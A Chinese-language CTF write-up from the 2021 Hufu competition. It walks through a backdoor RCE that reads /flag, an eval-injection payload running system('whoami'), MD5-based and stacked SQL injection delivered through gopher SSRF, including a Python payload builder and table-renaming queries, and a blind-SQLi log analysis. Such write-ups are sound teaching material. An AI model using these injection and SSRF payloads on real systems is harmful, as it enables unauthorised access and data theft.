2021数字中国虎符CTF部分Writeup

虎符2021CTF部分Writeup


WEB

签到

没放提示前,假签到,放提示后,真签到

image_1f2bkpt93b6u1ji1vaj1kus1f579.png-246.6kB

新闻前几天刚看,说是存在后门,直接找一下当时的新闻和代码

image_1f2bkr2541dpb1hgg1sth167o509m.png-88.5kB

恶意的RCE,利用方式:

image_1f2bkrv7m10tg1n6dm5tkj3147k1j.png-105.3kB

直接干一下

image_1f2bl0tv21o8qjqf1quv1c0h13hh20.png-230.8kB

命令执行,直接cat /flag即可

unsetme

image_1f2bl62sg1en1jsev6s1p3a12ii2d.png-73.1kB

直接搜索相应代码,获取到题目使用的PHP模板

image_1f2blmprs1jv9r3tiqmhpq1kgj2q.png-110.9kB

直接去github上把代码down下来,看一下base.php,直接看一下unset出现的地方

image_1f2brch029qerpu1irjgji1s7l79.png-63.4kB

在这里出现了一次eval()函数的调用,结合前后代码,我们如果可控eval达到代码执行的话需要闭合前面的数组和unset,同时注释掉后面的内容

:[]);system("whoami");//

image_1f2bri9b8dak9ksjdk19fm1rs17m.png-45.4kB

成功执行代码,获取flag

image_1f2briu6t2qljgiumpup5s1083.png-114.7kB

“慢慢做”管理系统

image_1f2bm2c251l901dco1kfh14vg1caf37.png-276.8kB

比较有意思的题目,题目描述很重要

根据提示第一步的sql注入需要利用md5进行注入,类似于实验吧的题目。不过这里把实验吧的payload给禁止掉了,我们可以使用另外的一个

image_1f2bm78s41mmv9ahqo5p39fnt3k.png-48.6kB

username=admin&password=129581926211651571912466741651878684928

进入之后告诉我们需要提交gopher

image_1f2bq0ktj1sj3103snvn1qbq3q04e.png-4.9kB

既然是SSRF,我们直接利用gopher协议打内网进行注入了,在admin.php页面下存在POST表单,构造POST报文

POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

username=admin' or 1=1 #&password=123

替换为gopher的payload,直接用python进行替换

import urllib
test =\
"""POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

username=admin' or 1=1 #&password=123

"""  
#huiche
tmp = urllib.quote(test)
new = tmp.replace('%0A','%0D%0A')
result='_'+urllib.quote(new)
#post
#result = '_'+new
common="gopher://127.0.0.1:80/"
print(urllib.quote(common)+result)

构造:

gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252037%250D%250A%250D%250Ausername%253Dadmin%2527%2520or%25201%253D1%2520%2523%2526password%253D123%250D%250A%250D%250A

提交查看结果

image_1f2bqau8m1kam15ik40tui55b4r.png-12.1kB

发现是以数组的形式将数据输出的,猜测存在堆叠注入,构造payload

gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252045%250D%250A%250D%250Ausername%253Dadmin%2527%253Bshow%2520databases%253B%2523%2526password%253D123%250D%250A%250D%250A

发现存在三种数据库

image_1f2bqe1u9mfd15onjkvqv210pb58.png-17.3kB

查看ctf2的数据表

gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252051%250D%250A%250D%250Ausername%253Dadmin%2527%253Buse%2520ctf2%253Bshow%2520tables%253B%2523%2526password%253D123%250D%250A%250D%250A

image_1f2bqgjt2sj91refbmp1e5aa2t5l.png-11.9kB

测试发现select perpare等关键词被过滤,我们可以使用19年强网杯的方式,利用rename,查看数据

POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 141

username=admin';use ctf2;rename table `fake_admin` to `fake_admin1`;rename table `real_admin_here_do_you_find` to `fake_admin`;#&password=123
gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%2520141%250D%250A%250D%250Ausername%253Dadmin%2527%253Buse%2520ctf2%253Brename%2520table%2520%2560fake_admin%2560%2520to%2520%2560fake_admin1%2560%253Brename%2520table%2520%2560real_admin_here_do_you_find%2560%2520to%2520%2560fake_admin%2560%253B%2523%2526password%253D123%250D%250A%250D%250A

再次使用万能密码查看内容

image_1f2bqsk811devvbhh84a591gcr62.png-11.8kB

成功获取到密码,这里要注意审题,题目说提交真-admin的密码,所以我们登陆的用户名是admin,密码是获取到的这个,构造一下

POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

username=admin&password=5fb4e07de914cfc82afb44vbaf402203
gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252056%250D%250A%250D%250Ausername%253Dadmin%2526password%253D5fb4e07de914cfc82afb44vbaf402203%250D%250A%250D%250A

image_1f2br0m9k1q784421ovf15d92e16f.png-13.4kB

出现cookie和302跳转,我们在构造的http头中添加上cookie,访问flag.php

GET /flag.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=ttmid17emjg67vco1bn5db45l7;
gopher%3A//127.0.0.1%3A80/_GET%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250ACookie%253A%2520PHPSESSID%253Dttmid17emjg67vco1bn5db45l7%253B%250D%250A%250D%250A

成功获取到flag

image_1f2br42ksifh1r3h1mail5mpft6s.png-10.1kB

Misc

你会日志分析吗

比较基础的日志盲注审计,首先看清楚sql语句

image_1f2brutv71gn1su81e094qt1skn8g.png-73.2kB

基于时间的盲注,如果flag的该位的ascii值是等于号相同的,也就是结果为真时,执行sleep(2)操作,否则不执行,所以思路比较简单,可以看时间变化进行判断,也可以看返回长度为377也可以进行判断,最后取出数据为base64编码数据

ZmxhZ3tZb3VfYXJlX3NvX2dyZWF0eQ==

#flag{You_are_so_great}

发表评论

邮箱地址不会被公开。 必填项已用*标注